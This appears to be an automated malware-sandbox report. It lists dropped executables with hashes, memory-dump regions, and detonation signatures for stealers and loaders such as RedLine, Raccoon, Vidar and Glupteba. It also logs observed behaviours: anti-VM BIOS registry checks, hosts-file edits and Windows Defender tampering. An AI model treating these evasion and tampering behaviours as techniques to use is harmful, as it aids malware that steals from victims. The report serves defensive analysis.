memory/2712-275-0x0000000005B20000-0x0000000005B21000-memory.dmp
memory/2712-276-0x0000000005B30000-0x0000000005B31000-memory.dmp
memory/2712-278-0x0000000005B40000-0x0000000005B41000-memory.dmp
memory/2712-279-0x0000000005B50000-0x0000000005B51000-memory.dmp
memory/3176-277-0x0000000000000000-mapping.dmp
memory/2712-273-0x0000000005B00000-0x0000000005B01000-memory.dmp
memory/1852-285-0x0000000005920000-0x0000000005921000-memory.dmp
memory/2712-283-0x0000000005B60000-0x0000000005B61000-memory.dmp
C:\Users\Admin\AppData\Roaming\6286019.exe
| MD5 | 724252e8cc86d50db3dd965a744188c0 |
| SHA1 | 4f96e366267aa778d2f6b11bc35e5aca518a6c30 |
| SHA256 | 786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff |
| SHA512 | 3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91 |
C:\Users\Admin\AppData\Roaming\6286019.exe
| MD5 | 724252e8cc86d50db3dd965a744188c0 |
| SHA1 | 4f96e366267aa778d2f6b11bc35e5aca518a6c30 |
| SHA256 | 786bcc1e15c4c6c7a37ac4908c5991d5589b6d04c74070c0f083287fc74782ff |
| SHA512 | 3443a8230f77555e1c101a6b9a91d6695a45ff1cc5a503cb14ba0b87cefc8a58ab7e3d96df344f2df043fd285bc235e81dae51a8c6317d9262c519f945dd7a91 |
memory/3176-284-0x0000000000130000-0x0000000000131000-memory.dmp
memory/3132-289-0x0000000004410000-0x0000000004426000-memory.dmp
memory/4416-290-0x0000000000400000-0x0000000000420000-memory.dmp
memory/1144-296-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\YYUtH3wzsrRdr9GJTVYmEo6Y.exe.log
| MD5 | e07da89fc7e325db9d25e845e27027a8 |
| SHA1 | 4b6a03bcdb46f325984cbbb6302ff79f33637e19 |
| SHA256 | 94ab73c00494d10a2159175b81e23047621451e3a566e5a0b1222379db634aaf |
| SHA512 | 1e33e34595ebb6ce129d0244199d29722c916c036da542c3001f84b10a964b96cec7a9fdd19e120d7840614b307b504be993a4f8538d54382aa4944575476dda |
C:\Users\Admin\Documents\YYUtH3wzsrRdr9GJTVYmEo6Y.exe
| MD5 | 29903569f45cc9979551427cc5d9fd99 |
| SHA1 | 0487682dd1300b26cea9275a405c8ad3383a1583 |
| SHA256 | eec05dc9ade2a7ee74ea5fb115bdd687b457d1f81841238a61e9775d6cc4bfa6 |
| SHA512 | f8f29c163bfabc90ade4981523feb943656cc20a562e5b4f6f2c6788f781408aec39114a129e765332aa0022d154d4516e9cb56bc01762b114833fddb30d23fb |
memory/2792-297-0x00000000009E0000-0x00000000009E1000-memory.dmp
C:\Users\Admin\AppData\Roaming\7848124.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
C:\Users\Admin\AppData\Roaming\7848124.exe
| MD5 | 3598180fddc06dbd304b76627143b01d |
| SHA1 | 1d39b0dd8425359ed94e606cb04f9c5e49ed1899 |
| SHA256 | 44a280749c51af08ff5c1aebcda01c36935f7ecb66d15f57e53c022ce0426bda |
| SHA512 | 8f77e49e2868dc9655dd5af20645799fb42940ca50f9dd0371bba9128286348ab3cbf09467f21b60d2596a0af6c755a43b92a26037b8dfae2e957602ff46ec9d |
memory/2792-287-0x0000000000000000-mapping.dmp
memory/4416-286-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1104254.exe
| MD5 | 820b27e48dac554a246970c5dfefd5ce |
| SHA1 | 02c7a5d427d043f063e706933cfd993258a58c9c |
| SHA256 | 01e36e0ee266f5726c5e7d2eb01537cce145836e115c3629b7ca1f61fd2ee709 |
| SHA512 | 0c0fafb33829db45737ef0b552c3326bc11f199fdf789f528f3990ff8b61a55d83a8658689a30f3422cf02ffa488feea8252ca6a169a7d5f9a27e119846cff04 |
memory/3068-303-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\4366989.exe
| MD5 | f194d7ae32b3bb8d9cb2e568ea60e962 |
| SHA1 | 2e96571159c632c6782c4af0c598d838e856ae0b |
| SHA256 | 88184a929722705ecf5fd0631703e8b11f20a7a3145d2d94c18401cdb63d4221 |
| SHA512 | fbdc1c143d84f2fbbe688a3b26cf3258e127f99a56632f995e8e435c0143b71cfb8b45fd272ba8d40363908fb7b547fad55a289f449fc0bd568fc0c021044691 |
memory/2792-309-0x0000000002E20000-0x0000000002E26000-memory.dmp
memory/3068-308-0x0000000000EC0000-0x0000000000EC1000-memory.dmp
C:\Users\Admin\AppData\Roaming\4366989.exe
| MD5 | f194d7ae32b3bb8d9cb2e568ea60e962 |
| SHA1 | 2e96571159c632c6782c4af0c598d838e856ae0b |
| SHA256 | 88184a929722705ecf5fd0631703e8b11f20a7a3145d2d94c18401cdb63d4221 |
| SHA512 | fbdc1c143d84f2fbbe688a3b26cf3258e127f99a56632f995e8e435c0143b71cfb8b45fd272ba8d40363908fb7b547fad55a289f449fc0bd568fc0c021044691 |
memory/3176-311-0x000000001AFF0000-0x000000001AFF2000-memory.dmp
memory/1972-314-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Roaming\1104254.exe
| MD5 | 820b27e48dac554a246970c5dfefd5ce |
| SHA1 | 02c7a5d427d043f063e706933cfd993258a58c9c |
| SHA256 | 01e36e0ee266f5726c5e7d2eb01537cce145836e115c3629b7ca1f61fd2ee709 |
| SHA512 | 0c0fafb33829db45737ef0b552c3326bc11f199fdf789f528f3990ff8b61a55d83a8658689a30f3422cf02ffa488feea8252ca6a169a7d5f9a27e119846cff04 |
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/4416-324-0x0000000004F30000-0x0000000005548000-memory.dmp
memory/3840-334-0x0000000000000000-mapping.dmp
memory/2988-335-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\PJ_aNIjQvqt14trhW_Ucrq8U.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
memory/4456-341-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\biPuD4NMCX1aWFXogrvwgyou.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
C:\Users\Admin\Documents\biPuD4NMCX1aWFXogrvwgyou.exe
| MD5 | 592404767648b0afc3cab6fade2fb7d2 |
| SHA1 | bab615526528b498a09d76decbf86691807e7822 |
| SHA256 | 3593247c384586966e5a0e28eb4c4174b31e93c78c7a9e8fef96ec42a152e509 |
| SHA512 | 83819e4956ac6da21c4927fa6edee2b178bc89bcda8fb5f4d0767d0d8310393f50f0f7e76e1a963002626a8176abfa8d864c9229a41e5b61e1a24a32d379dda9 |
C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe
| MD5 | 956c60ba7d7d44f04b4d9ae2db9f723e |
| SHA1 | 5b254193558cd413b015cd7efe7633e8712ffcb5 |
| SHA256 | 318ca6786488302f65aa4989d7be9b8ae25225ceef57894ef47e485153742170 |
| SHA512 | e5b10f641a8544f873ae23c37e0a7d850a0e59b012f0bf01d0a75382e3728436ff2c0077b8a61c71008ec44739fadedc5bdd1f33d052acf589dd944918fa1945 |
C:\Users\Admin\Documents\zmyJsBQVTyKAKlzE6Zk93Aiu.exe
| MD5 | 956c60ba7d7d44f04b4d9ae2db9f723e |
| SHA1 | 5b254193558cd413b015cd7efe7633e8712ffcb5 |
| SHA256 | 318ca6786488302f65aa4989d7be9b8ae25225ceef57894ef47e485153742170 |
| SHA512 | e5b10f641a8544f873ae23c37e0a7d850a0e59b012f0bf01d0a75382e3728436ff2c0077b8a61c71008ec44739fadedc5bdd1f33d052acf589dd944918fa1945 |
memory/880-346-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\BC41.tmp\BC42.tmp\extd.exe
| MD5 | b019efc4814c7a73b1413a335be1fa13 |
| SHA1 | 6e093c94cfa4a0fe25e626875f2b06a5cbc622d2 |
| SHA256 | a13ac752c70e4bbd3cd8a58c48d41a7d80946ad2a92780ee26f47100a01e345e |
| SHA512 | d8eae2f4e64ffd4cc3e6398a0e69aa54f7cc98a461d515cb7d8d9606b65c1bb1d70ff1a1cbbb6b84291898fe5d8926b908fdf46ed22ab5d8fc52a6c60bc7120b |
memory/1504-345-0x0000000000000000-mapping.dmp
memory/3256-344-0x0000000000000000-mapping.dmp
memory/1936-343-0x0000000000000000-mapping.dmp
memory/1580-336-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\OxEMjCce4jUyKLgMR7tzCSZn.exe
| MD5 | 161b975933aaae18920d241890000dac |
| SHA1 | 1cbbad54762c6301ad9ad2291159b9d2a141c143 |
| SHA256 | dcdb0bc5e91652e7e3d2269581275c18d8c5eabbde14f9c17c99e5ff49e54a83 |
| SHA512 | 758d1d206c887637d0727ba380d94d4cc1bb8a37cc705dbe62435a45c4ebb0ea111c9e9238261da64dd0d8ee5e27fd9851053dffa0359670a165973dd4f91443 |
memory/1196-357-0x0000000000000000-mapping.dmp
memory/3068-355-0x0000000005990000-0x0000000005991000-memory.dmp
C:\Users\Admin\Documents\68N9UkYMb0rIC3Al6Fz2bfWy.exe
| MD5 | b15db436045c3f484296acc6cff34a86 |
| SHA1 | 346ae322b55e14611f10a64f336aaa9ff6fed68c |
| SHA256 | dab2a18df66f2e74d0831a8b118de6b9df2642ac939cbad0552e30696d644193 |
| SHA512 | 804bee37e0a6247ef2edb5dba8d4b6820ff10b0a4cb76e4c039a7242285836ed5255a1f297f8ba96168d9295558844a9fd7ec3a977207f339296a001543c1fd9 |
C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe
| MD5 | 3b4348d187f24c82370836531f3fa94e |
| SHA1 | a2ca4e9f4a8d9c8634e42765e90e252803e20b15 |
| SHA256 | cd189a8c952420bf33b68cce03b41900e8c784b1010213b097ecdb2d7e8079f7 |
| SHA512 | 2bab3c1e38a21cefc06363db75931bf3bfe0b4ee3f089293a750dfc866abc32c7135d2d9ba7ccb005aa01ad02d0a75a5fa02f85ca78cc8fe637615b7fa9e7394 |
memory/3872-353-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\y6oB6X0JZzjl8qPpJh9Fxwxp.exe
| MD5 | 145bf5658332302310a7fe40ed77783d |
| SHA1 | 5370ac46379b8db9d9fca84f21d411687109486f |
| SHA256 | bddcd5eba3036a21b11e6d6d3cbe84daf562db27814adf7e32b5cc103d3c25d3 |
| SHA512 | d3d9a8231f256efee7ce7ba6841d78c598dc912e7e5d503a9a094e6303d0f9f165a60c5370f353076b1f592d7d9ee6765d0ba4863a1c4935bb47e2ffa4ffb776 |
C:\Users\Admin\Documents\y6oB6X0JZzjl8qPpJh9Fxwxp.exe
| MD5 | 145bf5658332302310a7fe40ed77783d |
| SHA1 | 5370ac46379b8db9d9fca84f21d411687109486f |
| SHA256 | bddcd5eba3036a21b11e6d6d3cbe84daf562db27814adf7e32b5cc103d3c25d3 |
| SHA512 | d3d9a8231f256efee7ce7ba6841d78c598dc912e7e5d503a9a094e6303d0f9f165a60c5370f353076b1f592d7d9ee6765d0ba4863a1c4935bb47e2ffa4ffb776 |
C:\Users\Admin\Documents\RUCOCZIgIz6EZKdtv5ptdFUF.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
memory/1144-367-0x0000000002B10000-0x0000000002B11000-memory.dmp
C:\Users\Admin\Documents\RUCOCZIgIz6EZKdtv5ptdFUF.exe
| MD5 | 7627ef162e039104d830924c3dbdab77 |
| SHA1 | e81996dc45106b349cb8c31eafbc2d353dc2f68b |
| SHA256 | 37896fe3568822c25970f8b4045e1504b21d7ddc54ccc9bbe85bf7f426f9b8a5 |
| SHA512 | 60501cac5e0b18c7d86624ef82f65696898dad5295f8bf28cd0e18a33e1c35d7efedf0ac7940e59b25367078dc85f7d8510ce765ce170da2613231485b923ae1 |
memory/5024-364-0x0000000000000000-mapping.dmp
memory/3596-363-0x0000000000000000-mapping.dmp
C:\Users\Admin\Documents\6w8pXrjYGBv_496W2DScTPB5.exe
| MD5 | 3b4348d187f24c82370836531f3fa94e |
| SHA1 | a2ca4e9f4a8d9c8634e42765e90e252803e20b15 |
| SHA256 | cd189a8c952420bf33b68cce03b41900e8c784b1010213b097ecdb2d7e8079f7 |
| SHA512 | 2bab3c1e38a21cefc06363db75931bf3bfe0b4ee3f089293a750dfc866abc32c7135d2d9ba7ccb005aa01ad02d0a75a5fa02f85ca78cc8fe637615b7fa9e7394 |
C:\Users\Admin\Documents\HUU_BBwFffdwtjU3aaYogmcF.exe
| MD5 | 44c355ae8cc3ecc4a95b5716fb9635fd |
| SHA1 | f4d46438cad6fac2be4fb08cf6972a8306e5e12a |
| SHA256 | f77f16151eb30569f7f1276063f67100c6ad439fde9d07605c5ae5e0c9eb8b7d |
| SHA512 | 46ab10861ff330796bd7e60c71e474ebb7a44d2000eea9d56c4fcc27d6b1e1c643996c91d6261f107aa5b86b3bbaf38c23be4705a6fcc3a587bd9d7422c7f259 |
C:\Users\Admin\Documents\PJ_aNIjQvqt14trhW_Ucrq8U.exe
| MD5 | c7ccbd62c259a382501ff67408594011 |
| SHA1 | c1dca912e6c63e3730f261a3b4ba86dec0acd5f3 |
| SHA256 | 8cfa7e9bc6cbd458cec18a25e6f763a3776802490e6b3d451d864c4dba50c437 |
| SHA512 | 5f5958363820795f96fff6ad71bc1b59ec01a6a24876c5d22d48efaa49bc55373fca1f8e927c23547cdb494ba46b6d3871f377e607c97d9f10d4e0636ac7ef2b |
C:\Users\Admin\Documents\qaGGfh07ZqrsDrnbz8QRWzTX.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\Documents\qaGGfh07ZqrsDrnbz8QRWzTX.exe
| MD5 | 94c78c311f499024a9f97cfdbb073623 |
| SHA1 | 50e91d3eaa06d2183bf8c6c411947304421c5626 |
| SHA256 | 6aef62b3b8890bc22dd99f9b0d48247ae52c69e7ad9e384332658e73c725e40e |
| SHA512 | 29b61f1924f19d073460332950c2316acf769aa40ad7f62a41941160cd8a8da5958e8f96183e0e498afe8558fc3efb3a23f66c7519c142c780c91279ddecb545 |
C:\Users\Admin\Documents\7tzdBCrqnVzn34WZzl2HJIRv.exe
| MD5 | 6753c0fadc839415e31b170b5df98fc7 |
| SHA1 | 7adbd92546bc0516013c0f6832ea272cf0606c60 |
| SHA256 | 01550ee84ac5a220197177182fd2f3f9c9e845b416d06a384384e3cd62ecb569 |
| SHA512 | 92c0264046f1293b02ccccbb3cb5b80510d2d3a1d1caff23815adb4c715d0aced08e57682c6dcb76fdca70eb46bc819db2a763f050f74de27fbb3946dca504ab |
memory/3884-378-0x0000000000000000-mapping.dmp
memory/3928-381-0x0000000000000000-mapping.dmp
memory/4116-384-0x0000000000000000-mapping.dmp
memory/2796-385-0x0000000000000000-mapping.dmp
memory/2988-388-0x00000000048B0000-0x00000000048DF000-memory.dmp
memory/1580-391-0x0000000004BC0000-0x0000000005166000-memory.dmp
memory/856-392-0x0000000000000000-mapping.dmp
memory/3872-397-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/3396-399-0x00000000007E0000-0x00000000007E3000-memory.dmp
memory/3020-405-0x0000000000000000-mapping.dmp
memory/3396-394-0x0000000000000000-mapping.dmp
memory/5284-413-0x0000000000000000-mapping.dmp
memory/5368-421-0x0000000000000000-mapping.dmp
memory/5432-426-0x0000000000000000-mapping.dmp
memory/2796-439-0x0000000005440000-0x0000000005A58000-memory.dmp
memory/5368-434-0x0000000000400000-0x0000000000414000-memory.dmp
memory/3884-428-0x0000000005590000-0x0000000005591000-memory.dmp
memory/5460-430-0x0000000000000000-mapping.dmp
memory/5572-443-0x0000000000000000-mapping.dmp
memory/5596-442-0x0000000000000000-mapping.dmp
memory/5548-440-0x0000000000000000-mapping.dmp
memory/5640-446-0x0000000000000000-mapping.dmp
memory/5572-464-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/5548-459-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5760-470-0x0000000000000000-mapping.dmp
memory/5772-463-0x0000000000000000-mapping.dmp
memory/5912-484-0x0000000000000000-mapping.dmp
memory/5972-483-0x0000000000000000-mapping.dmp
memory/5408-475-0x0000000000000000-mapping.dmp
memory/880-478-0x0000000005990000-0x0000000005991000-memory.dmp
memory/5572-472-0x00000000021A0000-0x00000000021A1000-memory.dmp
memory/1504-486-0x0000000005320000-0x0000000005321000-memory.dmp
memory/6116-497-0x0000000000000000-mapping.dmp
memory/5912-500-0x0000000000400000-0x0000000000414000-memory.dmp
memory/1936-494-0x0000000003F80000-0x0000000003FAF000-memory.dmp
memory/5760-506-0x0000000005A50000-0x0000000005A51000-memory.dmp
memory/3032-505-0x0000000000000000-mapping.dmp
memory/400-507-0x0000000000000000-mapping.dmp
memory/3032-524-0x0000000002100000-0x0000000002101000-memory.dmp
memory/3484-525-0x0000000000000000-mapping.dmp
memory/3124-517-0x0000000000000000-mapping.dmp
memory/3728-534-0x00000000020A0000-0x00000000020A1000-memory.dmp
memory/5796-535-0x0000000000000000-mapping.dmp
memory/3728-549-0x0000000005910000-0x0000000005911000-memory.dmp
memory/6116-553-0x000000001BAD0000-0x000000001BAD2000-memory.dmp
memory/5212-544-0x0000023DB5350000-0x0000023DB5352000-memory.dmp
memory/5572-558-0x0000000005A70000-0x0000000005A71000-memory.dmp
memory/5572-555-0x0000000005A60000-0x0000000005A61000-memory.dmp
memory/5408-537-0x0000000005530000-0x0000000005B48000-memory.dmp
memory/3596-530-0x0000000004080000-0x00000000040B0000-memory.dmp
memory/3728-515-0x0000000000000000-mapping.dmp
memory/5404-514-0x0000000000000000-mapping.dmp
memory/5640-518-0x0000000000400000-0x0000000000414000-memory.dmp
memory/5212-512-0x0000000000000000-mapping.dmp
memory/5772-509-0x0000000000400000-0x000000000046D000-memory.dmp
memory/5572-562-0x0000000005A80000-0x0000000005A81000-memory.dmp
memory/5572-565-0x0000000005A90000-0x0000000005A91000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted: 2021-08-24 08:16
Reported: 2021-08-24 08:46
Platform: win11
Max time kernel: 371s
Max time network: 1780s
Command Line
Signatures
Glupteba
Glupteba Payload
MetaSploit
Modifies Windows Defender Real-time Protection settings
NetSupport
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
| Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | N/A | C:\Windows\system32\rundll32.exe | |
Raccoon
RedLine
RedLine Payload
SmokeLoader
Suspicious use of NtCreateProcessExOtherParentProcess
Vidar
Checks for common network interception software
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
Downloads MZ/PE file
Drops file in Drivers directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\system32\drivers\etc\hosts | C:\Users\Admin\AppData\Local\Temp\is-6JNGI.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\SET3995.tmp | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| File created | C:\Windows\System32\drivers\SET3995.tmp | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
| File opened for modification | C:\Windows\System32\drivers\tap0901.sys | C:\Program Files (x86)\MaskVPN\mask_svc.exe | N/A |
Executes dropped EXE
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\j_sG47ABVU_dnhRofMeyIAvt.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\JDkxd0BisQ3uX9WNGecGxdCL.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\2HuEPZ58JHXyBF7DWrWix9G2.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Documents\tlQg7FWtgrgJmIVIZfF7FQAG.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Data\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\ProgramData\Systemd\Database.exe | N/A |
